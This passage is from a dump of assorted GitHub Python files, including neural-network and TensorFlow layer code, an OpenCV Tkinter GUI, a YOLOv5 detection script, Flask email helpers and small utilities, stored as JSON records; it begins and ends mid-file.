after\n#    activating the neuron only.\n# Methods (private)\n# 1. __activation_func__ : This function actually does the \"computation\"\n#    inside the neuron.\n# Assumption:\n# Our activation function is a binary step function with threshold range\n# min_threshold and max_threshold. 
Input within the threshold range yields \n# output 1, whereas input outside the threshold yields output 0.\n#------------------------------------------------------------------------------\nclass neuron (annErrors) :\n    def __init__ (self, threshold_range, in_link, out_link, layer, timer, name = {}):\n        self.name = name\n        self.min_threshold = threshold_range[0]\n        self.max_threshold = threshold_range[1]\n        self.in_link = []\n        self.out_link = []\n        self.timer = timer\n        self.layer = layer\n        self.init_state = 0\n        \n        for l in in_link : \n            self.in_link.append(l)\n        # end for\n        \n        for o in out_link :\n            self.out_link.append(o)\n        # end for \n    # end def __init__ ()\n\n    def input (self, value) :\n        i = 0\n        for val in value :\n            if (self.in_link[i].type() == 'input') :\n                self.in_link[i].send(val)\n                i = i + 1\n            else :\n                annErr.error('001')\n            # end for\n        # end for \n    # end def\n\n    def output (self) :\n        outlist = []\n        for o in self.out_link :\n            if o.type() == 'output' :\n                outlist.append(o.get())\n            else :\n                annErr.error('002') \n            # end if\n        # end for\n        return outlist\n    # end def\n\n    def __activation_func__ (self, val) :\n        if ((val >= self.min_threshold) and (val <= self.max_threshold)):\n            return 1.0\n        else :\n            return 0.0\n        # end if\n    # end def \n    \n    def activate (self) :\n        total_in = 0\n        for i in self.in_link :\n            total_in = total_in + i.get()\n        # end for\n        output = self.__activation_func__(total_in)\n        # end if\n        if (self.timer.getTime()) >= self.layer :\n            for o in self.out_link :\n                if (o.type() == 'output') or (o.type() == 'input') :\n                    o.send(output)\n                else :\n                    annErr.error('003')\n                # end if\n            # end for\n        # end if\n    # end def\n# end class\n\n#-------------------------------------------------------------------------------\n# This class is used to emulate a link between two neurons. A link class must \n# have the property called weight. A signal passing through the link must be \n# multiplied by its weight.\n#-------------------------------------------------------------------------------\nclass link (annErrors) :\n    def __init__ (self, weight = 1, type = 'link') :\n        self.weight = weight\n        self.in_signal = 0\n        self.out_signal = 0\n        if ((type == 'input') or\n            (type == 'output') or\n            (type == 'bias')) :\n            self.link_type = type\n        else :\n            annErr.error('004') \n        # end if\n    # end def\n\n    def send (self, val) :\n        self.in_signal = val \n    # end def\n\n    def get (self) :\n        self.out_signal = self.in_signal * self.weight\n        return self.out_signal\n    # end def\n\n    def type (self) :\n        return self.link_type\n    # end def\n\n    def setWeight(self, value) :\n        self.weight = value\n    # end def\n    \n    def setBiasInput(self, val) :\n        if (self.link_type == 'bias') :\n            self.send(val)\n        else :\n            annErr.error('005')\n        # end if\n    # end def\n# end class\n\n#-------------------------------------------------------------------------------\n# This class is used as a timer which determines the sequence in which neurons\n# should be fired. 
The set of neurons that are architecturally at the same \n# layer should be fired at the same time.\n#-------------------------------------------------------------------------------\nclass timer () :\n def __init__ (self, max_layers) :\n self.current_time = 0\n self.max_layers = max_layers \n # end def\n\n def tick(self):\n if (self.current_time <= self.max_layers):\n self.current_time = self.current_time + 1\n return self.current_time\n else:\n self.reset()\n return self.current_time\n # end if\n # end def\n \n def getTime (self):\n return self.current_time\n # end def\n\n def reset (self):\n self.current_time = 0\n # end def \n# end class\n","repo_name":"abhijitdhar16/ann","sub_path":"neuron.py","file_name":"neuron.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19777234071","text":"class ScrapingProjectConstants(object):\n csv_extension = '.csv'\n baftas = 'baftas'\n academy_awards = 'academy_awards'\n cinema_showings = 'cinema_showings'\n cinemas_near_me = 'cinemas_near_me'\n films = 'films'\n films_near_me = 'films_near_me'\n gdp_file = 'monthly_gdp_uk_v2_cleaned.csv'\n weather_file = 'uk_monthly_weather_cleaned.csv'\n twitter_odeon_file = 'compiled_tweets_odeon.csv'\n box_office_file = 'compiled_top_15_box_office.csv'\n google_maps_scraper_output = 'C:/Users/johnd/OneDrive/Documents/cbq/third_proper_year/diss/code/scraping_project/google_maps_scraper/output'\n LIST_OF_NON_LONDON_POSTCODE_AREAS = ['St Albans', 'Brighton', 'Bromley', 'Cambridge', 'Chelmsford', 'Colchester',\n 'Croydon',\n 'Canterbury', 'Dartford', 'Enfield', 'Guildford', 'Harrow', 'Hemel Hempstead',\n 'Ilford',\n 'Kingston upon Thames', 'Rochester', 'Milton Keynes', 'Northampton', 'Oxford',\n 'Portsmouth',\n 'Reading', 'Redhill', 'Romford', 'Stevenage', 'Slough', 'Sutton', 'Swindon',\n 'Southampton',\n 'Southend-on-Sea', 'Tonbridge', 'Twickenham', 'Southall', 'Watford', 'Bath',\n 'Bournemouth',\n 'Bristol', 'Dorchester', 'Exeter', 'Gloucester', 'Hereford', 'Plymouth',\n 'Swindon', 'Salisbury',\n 'Taunton', 'Torquay', 'Truro', 'Cambridge', 'Chelmsford', 'Colchester',\n 'Ipswich', 'Norwich',\n 'Peterborough', 'Southend-on-Sea', 'Birmingham', 'Coventry', 'Dudley',\n 'Hereford',\n 'Llandrindod Wells', 'Stoke-on-Trent', 'Shrewsbury', 'Telford', 'Worcester',\n 'Walsall',\n 'Wolverhampton', 'Derby', 'Leicester', 'Lincoln', 'Nottingham', 'Northampton',\n 'Bradford',\n 'Doncaster', 'Huddersfield', 'Harrogate', 'Hull', 'Leeds', 'Sheffield',\n 'Wakefield', 'York',\n 'Durham', 'Darlington', 'Newcastle upon Tyne', 'Sunderland', 'Cleveland']\n\n LIST_OF_LONDON_POSTCODE_AREAS = ['Central London', 'East London', 'North London', 'Northeast London',\n 'Northwest London',\n 'Southeast London', 'Southwest London', 'West London']","repo_name":"John-D-T/webscrape_and_nowcast_project","sub_path":"common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20079700364","text":"from geometry.helpers import print_time_elapsed\nfrom geometry.point import Point\nfrom geometry.cube import Cube\nfrom geometry.enums import SPATIAL_DIRECTION\n\nfrom constants import (\n CUBES_ARRAY_WIDTH,\n CUBES_ARRAY_HEIGHT,\n CUBES_ARRAY_DEPTH,\n)\n\n\n# Class used to create, incapsulate and operate with a 3-D array of cubes\nclass CubeFromCubes:\n __slots__ = 'array',\n\n def __init__(self):\n self.array = 
self._create_cubes_array()\n\n @print_time_elapsed\n def _create_cubes_array(self):\n cubes_array = []\n cubes_plot = []\n cubes_row = []\n\n for plot in range(CUBES_ARRAY_HEIGHT):\n for row in range(CUBES_ARRAY_DEPTH):\n for cube in range(CUBES_ARRAY_WIDTH):\n cube = Cube(position_within_parent_cube=Point(row, cube, plot))\n cubes_row.append(cube)\n\n cubes_row = cubes_plot.append(cubes_row) or [] # append current cubes row and clear\n cubes_plot = cubes_array.append(cubes_plot) or [] # append current cubes plot and clear\n\n return cubes_array\n\n @print_time_elapsed\n def draw(self):\n from kivy.graphics import Color\n for plot in self.array: # height (z)\n for row in plot[::-1]: # rows from back to front\n for cube in row[::-1]: # cubes from left to right #\n cube.draw_sides()\n\n Color(rgba=(0, 0, 0, 100))\n\n for side in cube.drawn_sides:\n dashed, dash_offset = None, None\n # Color(rgba=(0, 0, 0, 2))\n no_draw = False\n if side.side_name in [SPATIAL_DIRECTION.LEFT, SPATIAL_DIRECTION.BACK]:\n Color(rgba=(0, 0, 0, 100))\n dashed = []\n dash_offset = 10\n no_draw = True\n\n if not no_draw:\n side.draw_edges(dashed=dashed, dash_offset=dash_offset)\n","repo_name":"Desantnikov/kivy_3d_graphics","sub_path":"geometry/cube_from_cubes.py","file_name":"cube_from_cubes.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14191621235","text":"from helper import *\nfrom solution import *\nfrom math import *\nimport time\n\n#Use for testing the training and testing processes of a model\ndef train_test_a_model(modelname, train_data, train_label, test_data, test_label, max_iter, learning_rate):\n '''\n you should try various number of max_iter and learning_rate\n '''\n if (modelname == \"logistic_regression\"):\n print(\"-------- Model: Logistic Regression ---------\")\n \n else:\n print(\"-------- Model: Third Order Regression ---------\")\n\n w = logistic_regression(train_data, train_label, max_iter, learning_rate)\n acc = accuracy(test_data, test_label, w)\n \n print(\"Accuracy:\", acc, \"\\n\")\n\ndef test_logistic_regression():\n '''\n you should try various number of max_iter and learning_rate\n '''\n # get training data\n df_train = load_features(\"../data/train.txt\")\n train_data = df_train[0]\n train_label = df_train[1]\n # get test data\n df_test = load_features(\"../data/test.txt\")\n test_data = df_test[0]\n test_label = df_test[1]\n # train and test the model\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 0.01)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 0.01)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 0.5)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 0.5)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 1000, 1)\n train_test_a_model(\"logistic_regression\", train_data, train_label, test_data, test_label, 10000, 1)\n\ndef test_thirdorder_logistic_regression():\n '''\n you should try various number of max_iter and learning_rate\n '''\n # get the data to be transformed\n df_train = load_features(\"../data/train.txt\")\n df_test = load_features(\"../data/test.txt\")\n\n # get the third order transformed data\n data = np.append(df_train[0], df_test[0], axis=0)\n data = thirdorder(data)\n\n # split the training and testing 
data and labels\n    train_data = data[:1561,:]\n    train_label = df_train[1]\n    test_data = data[1561:, :]\n    test_label = df_test[1]\n\n    # train and test the model\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 0.01)\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 0.01)\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 0.5)\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 0.5)\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 1000, 1)\n    train_test_a_model(\"thirdorder_regression\", train_data, train_label, test_data, test_label, 10000, 1)\n\nif __name__ == '__main__':\n\ttest_logistic_regression()\n\ttest_thirdorder_logistic_regression()\n","repo_name":"RachayitaGiri/ai-homeworks","sub_path":"HW1/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8856024988","text":"# Function to place inside a while loop: asks a question and whether the user wants to continue\ndef ask_ok(prompt, follow=\"Continando \"):\n    while True:\n        ok = input(prompt)\n        if ok in [\"SIM\", \"SI\", \"S\", \"sim\", \"si\", \"s\", \"ok\"]:\n            print(follow)\n            return True\n        elif ok in [\"n\", \"na\", \"nao\", \"não\", \"nã\", \"N\", \"NA\", \"NÃ\", \"NÃO\", \"NAO\"]:\n            print(\"\\nEntão digite novamente \")\n            return False\n        else:\n            print(\"\\nPOR FAVOR DIGITE SIM OU NAO\")\n        \nif __name__ == \"__main__\":\n    while True:\n        dataNasc = input(\"Digite sua data de nascimento com barras (ex. 01/01/1900): \")\n        if ask_ok(\"A data \" + '\\033[1m' + dataNasc + \"\\033[0;0m\" +\" está correta? 
\", \"Continuando com a data: \" + '\\033[1m' + dataNasc + \"\\033[0;0m\")==True:\n break\n","repo_name":"MatheusFacina/MatheusFacina","sub_path":"basicfunctions.py","file_name":"basicfunctions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6432811189","text":"import tkinter as tk\nimport hw1_function as func\n\nwindow = tk.Tk()\nwindow.title('openCV')\nwindow.geometry('600x800')\n\nappmenu = tk.Menu(window)\n\nfilemenu = tk.Menu(appmenu, tearoff=0)\nfilemenu.add_command(\n label='開啟影像', command=lambda: func.open_image(window=window))\nfilemenu.add_command(label='儲存影像', command=lambda: func.save_image())\nappmenu.add_cascade(label='檔案(File)', menu=filemenu)\n\nsettingmenu = tk.Menu(appmenu, tearoff=0)\nsetting_color_space_menu = tk.Menu(settingmenu, tearoff=0)\nsettingmenu.add_command(\n label='設定ROI', command=lambda: func.set_roi(window=window))\nsettingmenu.add_command(\n label='顯示影像資訊', command=lambda: func.show_image_information())\nsetting_color_space_menu.add_command(\n label='RGB', command=lambda: func.change_color_space_rgb(window=window))\nsetting_color_space_menu.add_command(\n label='HSV', command=lambda: func.change_color_space_hsv(window=window))\nsetting_color_space_menu.add_command(\n label='灰階', command=lambda: func.change_color_space_gray(window=window))\nsettingmenu.add_cascade(label='改變色彩空間', menu=setting_color_space_menu)\nappmenu.add_cascade(label='設定(Setting)', menu=settingmenu)\n\nprocessingmenu = tk.Menu(appmenu, tearoff=0)\nsetting_filter_menu = tk.Menu(processingmenu, tearoff=0)\nsetting_filter_menu.add_command(\n label='均值濾波(Averaging Filter)', command=lambda: func.averaging_filter(window=window))\nsetting_filter_menu.add_command(\n label='高斯濾波(Gaussian Filter)', command=lambda: func.gaussian_filter(window=window))\nsetting_filter_menu.add_command(\n label='中值濾波(Median Filter)', command=lambda: func.median_filter(window=window))\nsetting_filter_menu.add_command(\n label='雙邊濾波(Bilateral Filter)', command=lambda: func.bilateral_filter(window=window))\nsetting_filter_menu.add_command(\n label='索貝爾濾波(Sobel Filter)', command=lambda: func.sobel_filter(window=window))\nsetting_filter_menu.add_command(\n label='拉普拉斯濾波(Laplacian Filter)', command=lambda: func.laplacian_filter(window=window))\nprocessingmenu.add_cascade(label='鄰域處理', menu=setting_filter_menu)\nprocessingmenu.add_command(label='影像二值化(Thresholding)',\n command=lambda: func.thresholding(window=window))\nprocessingmenu.add_command(label='直方圖等化(Histogram Equalization)',\n command=lambda: func.histogram_equalization(window=window))\nprocessingmenu.add_command(label='仿射轉換(Affine Transform)',\n command=lambda: func.affine_transform(window=window))\nprocessingmenu.add_command(label='透視投影轉換(Perspective Transform)',\n command=lambda: func.perspective_transform(window=window))\nappmenu.add_cascade(label='影像處理(Image Processing)', menu=processingmenu)\n\nothermenu = tk.Menu(appmenu, tearoff=0)\nothermenu.add_command(\n label='合併影像(Image Merge)', command=lambda: func.image_merge(window=window))\nappmenu.add_cascade(label='其他功能(others)', menu=othermenu)\n\nappmenu.add_command(label='離開(Quit)', command=lambda: exit())\n\nwindow.config(menu=appmenu)\n\nwindow.mainloop()\n","repo_name":"h1431532403240/openCV-hw1","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"4813514586","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[11]:\n\n\nfrom matplotlib import scale\nimport torch\nimport numpy as np\nimport cv2\nimport pandas as pd\nimport math\n\nyolo_result=''\n\ndef getYOLO(img) :\n\n try :\n # 모델 로드\n torch.hub._validate_not_a_forked_repo=lambda a,b,c: True\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='0727last.pt', force_reload=True)\n\n # 이미지 받아오기 \n\n #for img in enumerate(IMAGE_FILES):\n\n\n\n # 모델 돌린 결과 중 라벨값 변수에 담아주기 \n \n results = model(img)\n\n findThing = results.pandas().xyxy[0]['name']\n findList=[]\n for find in findThing :\n findList.append(find)\n print(findList) \n\n # 좌푯값 받아오기\n xmin = results.pandas().xyxy[0]['xmin']\n xmax = results.pandas().xyxy[0]['xmax']\n ymin = results.pandas().xyxy[0]['ymin']\n ymax = results.pandas().xyxy[0]['ymax']\n\n # 좌푯값 데이터 프레임에 저장\n\n dots = results.pandas().xyxy[0]\n dotsdf = pd.DataFrame(dots)\n dotsdf['xpoint'] = (xmin+xmax)/2\n dotsdf['ypoint'] = (ymin+ymax)/2\n\n # 라벨들 바운딩 박스 중앙 좌표값\n\n persondot = dotsdf[dotsdf['name']=='person'][['xpoint','ypoint']]\n notpersondot = dotsdf[dotsdf['name']!='person'][['name','xpoint','ypoint']]\n\n if notpersondot.empty :\n yolo_result = 'noobject'\n #continue\n\n if persondot.empty :\n yolo_result = 'noperson'\n #continue\n\n persondotlist = persondot.values.tolist()\n notpersondotlist = notpersondot.values.tolist()\n\n\n\n # 사람 좌표와 객체 좌표간 거리 구하기\n\n distance = []\n\n for i in range (len(notpersondotlist)) :\n distance.append(math.sqrt(math.pow(int(persondotlist[0][0]) - int(notpersondotlist[i][1]) , 2) + math.pow(int(persondotlist[0][1]) - int(notpersondotlist[i][2]) , 2) ) )\n\n # 가장 가까운 값 구하기 위해 객체와의 거리값 데이터프레임에 컬럼으로 추가 \n\n notpersondot['distance'] = distance\n\n # name값 변수로 담아주기\n\n yolo_result = notpersondot[notpersondot[\"distance\"] == notpersondot[\"distance\"].min()].iloc[0,0]\n print(yolo_result + '가 검출되었습니다')\n\n # if 문으로 스켈레톤 값과 YOLO name 값 취합해서 Str 형태 타입으로 반환해주기 \n\n\n # Results\n results.print()\n\n except IndexError:\n pass\n \n return yolo_result\n\n\n# if yolo_result == 'book' and skeleton_result == 'less_active' :\n# final_result == 'reading'\n# elif yolo_result == 'dumbbell' and skeleton_result == 'active' :\n# final_result == 'workout'\n\n","repo_name":"seoyyy/MyStudy","sub_path":"project_SoundBunker/yolo_final.py","file_name":"yolo_final.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5127736175","text":"\"\"\" Tablib - DataFrame Support.\n\"\"\"\n\n\nimport sys\n\n\nif sys.version_info[0] > 2:\n from io import BytesIO\nelse:\n from cStringIO import StringIO as BytesIO\n\ntry:\n from pandas import DataFrame\nexcept ImportError:\n DataFrame = None\n\nimport tablib\n\nfrom tablib.compat import unicode\n\ntitle = 'df'\nextensions = ('df', )\n\ndef detect(stream):\n \"\"\"Returns True if given stream is a DataFrame.\"\"\"\n if DataFrame is None:\n return False\n try:\n DataFrame(stream)\n return True\n except ValueError:\n return False\n\n\ndef export_set(dset, index=None):\n \"\"\"Returns DataFrame representation of DataBook.\"\"\"\n if DataFrame is None:\n raise NotImplementedError(\n 'DataFrame Format requires `pandas` to be installed.'\n ' Try `pip install tablib[pandas]`.')\n dataframe = DataFrame(dset.dict, columns=dset.headers)\n return dataframe\n\n\ndef import_set(dset, in_stream):\n \"\"\"Returns dataset from DataFrame.\"\"\"\n dset.wipe()\n dset.dict = 
in_stream.to_dict(orient='records')\n","repo_name":"ZhiqiKou/TravelWeb","sub_path":"zhiqiTravelenv/lib/python3.6/site-packages/tablib/formats/_df.py","file_name":"_df.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"66"} +{"seq_id":"26486467981","text":"from threading import Thread\nfrom typing import List\n\nfrom flask_mail import Message\n\nfrom app import current_app\nfrom app import mail\n\n\ndef send_async_email(app: current_app, msg: Message) -> None:\n \"\"\"\n Asynchronous wrapper for sending an email message\n :param app: application instance\n :param msg: the message to send\n :return:\n \"\"\"\n with app.app_context():\n mail.send(msg)\n\n\ndef send_email(subject: str, sender: str, recipients: List[str], text_body: str, html_body: str,\n attachments=None, sync=False) -> None:\n \"\"\"\n Send an email message\n :param subject: subject of the email\n :param sender: sender's email address\n :param recipients: list of recipient email addresses\n :param text_body: plain-text body\n :param html_body: HTML body\n :return:\n \"\"\"\n with current_app.app_context():\n msg = Message(subject, sender=sender, recipients=recipients)\n msg.body = text_body\n msg.html = html_body\n\n if attachments:\n for attachment in attachments:\n msg.attach(*attachment)\n if sync:\n mail.send(msg)\n else:\n # Start the sending thread\n Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()\n","repo_name":"IANovoselov/microblog","sub_path":"app/email_service.py","file_name":"email_service.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11152004553","text":"import tensorflow as tf\nimport numpy as np\nimport math\n'''\nUtility layers\n'''\ndef upsampling(x, size, name='upsample'):\n return tf.image.resize_nearest_neighbor(x, size=size, name=name)\n\ndef pixel_shuffle(x, block_size=2, name='pixel_shuffle'):\n return tf.depth_to_space(x, block_size, name=name)\n\ndef sigmoid(x):\n return tf.nn.sigmoid(x, name=\"sigmoid\")\n\ndef relu(x, leaky=False):\n if leaky:\n return tf.nn.leaky_relu(x, name='leaky_relu')\n else:\n return tf.nn.relu(x, name='relu')\n\ndef relu6(x, leaky=False):\n return tf.nn.relu6(x, name='relu6')\n\ndef batch_norm(x, momentum=0.9, epsilon=1e-5, training=False, name='bn'):\n return tf.layers.batch_normalization(x, momentum=momentum, epsilon=epsilon, scale=True, training=training, name=name)\n\ndef hard_sigmoid(x, name='hard_sigmoid'):\n with tf.variable_scope(name):\n return tf.keras.activations.hard_sigmoid(x)\n\ndef tanh(x, name='tanh'):\n return tf.nn.tanh(x, name=name)\n\ndef global_avg(x):\n with tf.name_scope('global_avg'):\n net=tf.layers.average_pooling2d(x, x.get_shape()[1:-1], 1)\n return net\n\ndef flatten(x):\n #flattened=tf.reshape(input,[x.get_shape().as_list()[0], -1]) # or, tf.layers.flatten(x)\n return tf.contrib.layers.flatten(x)\n\ndef pad2d(inputs, pad=(0, 0), mode='CONSTANT'):\n paddings = [[0, 0], [pad[0], pad[0]], [pad[1], pad[1]], [0, 0]]\n net = tf.pad(inputs, paddings, mode=mode)\n return net\n\ndef spectral_norm(w, iteration=1):\n w_shape = w.shape.as_list()\n w = tf.reshape(w, [-1, w_shape[-1]])\n\n u = tf.get_variable('u', [1, w_shape[-1]], initializer=tf.random_normal_initializer(), trainable=False)\n\n u_hat = u\n v_hat = None\n for _ in range(iteration):\n\n \"\"\"\n power iteration\n Usually iteration = 1 will be enough\n \"\"\"\n\n v_ = tf.matmul(u_hat, tf.transpose(w))\n v_hat = 
tf.nn.l2_normalize(v_)\n\n u_ = tf.matmul(v_hat, w)\n u_hat = tf.nn.l2_normalize(u_)\n\n u_hat = tf.stop_gradient(u_hat)\n v_hat = tf.stop_gradient(v_hat)\n\n sigma = tf.matmul(tf.matmul(v_hat, w), tf.transpose(u_hat))\n\n with tf.control_dependencies([u.assign(u_hat)]):\n w_norm = w / sigma\n w_norm = tf.reshape(w_norm, w_shape)\n\n\n return w_norm\n'''\nEnd of Utility layers\n'''\n\n'''\nConvulution Layers\n'''\ndef conv2d(x, filter_shape, stride=1, bias=True, padding='SAME', snorm=False, name='conv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=filter_shape, initializer=tf.contrib.layers.xavier_initializer())\n if snorm:\n w = spectral_norm(w)\n\n x = tf.nn.conv2d(x, w, [1, stride, stride, 1], padding=padding)\n if bias:\n b = tf.get_variable('bias', shape=filter_shape[-1], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n \n return x\n\ndef deconv2d(x, filter_shape, output_shape, stride=1, bias=True, padding='SAME', name='deconv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=filter_shape, initializer=tf.contrib.layers.xavier_initializer())\n x = tf.nn.conv2d_transpose(x, w, output_shape, [1, stride, stride, 1], padding=padding)\n\n if bias:\n b = tf.get_variable('bias', shape=filter_shape[-2], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n\n return x\n\ndef dwise_conv(x, input_dim, channel_multiplier=1, filter_size=3, stride=1, bias=True, padding='SAME', name='dw_conv'):\n with tf.variable_scope(name):\n w = tf.get_variable('weight', shape=[filter_size, filter_size, input_dim, channel_multiplier],\n initializer=tf.contrib.layers.xavier_initializer())\n x = tf.nn.depthwise_conv2d(x, w, [1, stride, stride, 1], padding = padding)\n\n if bias:\n b = tf.get_variable('bias', shape=[input_dim*channel_multiplier], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n\n return x\n\ndef pwise_conv(x, input_dim, output_dim, bias=True, name='pw_conv'):\n return conv2d(x, [1,1,input_dim,output_dim], stride=1, bias=bias, padding='SAME', name=name)\n\ndef separable_conv(x, input_dim, output_dim, filter_size=3, channel_multiplier=1, stride=1, bias=True, padding='SAME', name='sp_conv'):\n with tf.variable_scope(name):\n dwise_filter = tf.get_variable('dw', shape=[filter_size, filter_size, input_dim, channel_multiplier],\n initializer=tf.contrib.layers.xavier_initializer())\n\n pwise_filter = tf.get_variable('pw', [1, 1, input_dim*channel_multiplier, output_dim],\n initializer=tf.contrib.layers.xavier_initializer()) \n x = tf.nn.separable_conv2d(x,dwise_filter,pwise_filter,[1,stride, stride,1],padding=padding, name=name)\n if bias:\n b = tf.get_variable('bias', [output_dim], initializer=tf.constant_initializer(0.1))\n x = tf.nn.bias_add(x, b)\n return x\n'''\nEnd of Convulutions Layers\n'''\n'''\nBlocks\n'''\ndef conv2d_block(x, input_dim, output_dim, filter_size=3, stride=1, bias=True, padding='SAME',\n snorm=False, leaky=False, linear=False, af=\"relu\", name='conv_block'):\n with tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding,\n snorm=snorm, name='conv')\n if linear:\n out = net\n else:\n if af == \"relu\":\n out = relu(net, leaky)\n elif af == \"sigmoid\":\n out = sigmoid(net)\n elif af == \"tanh\":\n out = tanh(net)\n return out\n\ndef deconv_block(x, input_dim, output_dim, output_shape, filter_size=3, stride=1, bias=True, padding='SAME',\n leaky=False, linear=False, name='deconv_block'):\n with 
tf.variable_scope(name):\n net = deconv2d(x, [filter_size, filter_size, output_dim, input_dim], output_shape,\n stride=stride, bias=bias, padding=padding, name='deconv')\n if linear:\n out = net\n else:\n out = relu(net, leaky)\n return out\n\ndef conv2d_bn_block(x, input_dim, output_dim, is_train, filter_size=3, stride=1, bias=False, padding='SAME',\n snorm=False, leaky=False, name='conv_block'):\n with tf.variable_scope(name):\n net = conv2d(x, [filter_size, filter_size, input_dim, output_dim], stride=stride, bias=bias, padding=padding,\n snorm=snorm, name='conv')\n net = batch_norm(net, training=is_train, name='bn')\n out = relu(net, leaky)\n return out\n\ndef dwise_block(x, input_dim, channel_multiplier, filter_size=3, stride=1, bias=True, leaky=False, name='dw_block'):\n with tf.variable_scope(name):\n net = dwise_conv(x, input_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n out = relu(net, leaky)\n return out\n \ndef pwise_block(x, input_dim, output_dim, bias=True, leaky=False, name='pw_block'):\n with tf.variable_scope(name):\n net = pwise_conv(x, input_dim, output_dim, bias=bias, name='pw')\n out = relu(net, leaky)\n return out\n \ndef separable_block(x, input_dim, output_dim, filter_size=3, channel_multiplier=1, stride=1, bias=True, leaky=False, name='sp_block'):\n with tf.variable_scope(name):\n net = dwise_conv(x, input_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = relu(net, leaky)\n net = pwise_conv(net, input_dim*channel_multiplier, output_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n out = net\n return out\n \ndef res_block(x, input_dim, output_dim, expansion_ratio, channel_multiplier=1,\n filter_size=3, stride=1, bias=True, leaky=False, shortcut=True, name='res_block'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim=round(expansion_ratio*input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias, name='dw')\n net = relu(net, leaky)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim*channel_multiplier, output_dim, bias=bias, name='pw_linear')\n \n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim=int(input_dim)\n if in_dim != output_dim:\n ins=pwise_conv(x,input_dim, output_dim, bias=bias, name='ex_dim')\n net=ins+net\n else:\n net=x+net\n return net\n\n\ndef res_block_with_attention(x, input_dim, output_dim, expansion_ratio, channel_multiplier=1,\n filter_size=3, stride=1, bias=True, leaky=False, shortcut=True, name='res_block_with_attention'):\n with tf.variable_scope(name):\n # pw\n bottleneck_dim = round(expansion_ratio * input_dim)\n net = pwise_conv(x, input_dim, bottleneck_dim, bias=bias, name='pw')\n net = relu(net, leaky)\n # dw\n net = dwise_conv(net, bottleneck_dim, channel_multiplier, filter_size=filter_size, stride=stride, bias=bias,\n name='dw')\n net = relu(net, leaky)\n # pw & linear\n net = pwise_conv(net, bottleneck_dim * channel_multiplier, output_dim, bias=bias, name='pw_linear')\n\n channel = net.get_shape().as_list()[-1]\n\n # spatial attention\n spatial_a = dwise_conv(net, channel, channel_multiplier, filter_size=7, stride=1, bias=True,\n name='spatial_dw')\n spatial_a = hard_sigmoid(spatial_a)\n net = net * spatial_a\n\n # element wise add, only for stride==1\n if shortcut and stride == 1:\n in_dim = int(input_dim)\n if in_dim != output_dim:\n ins = 
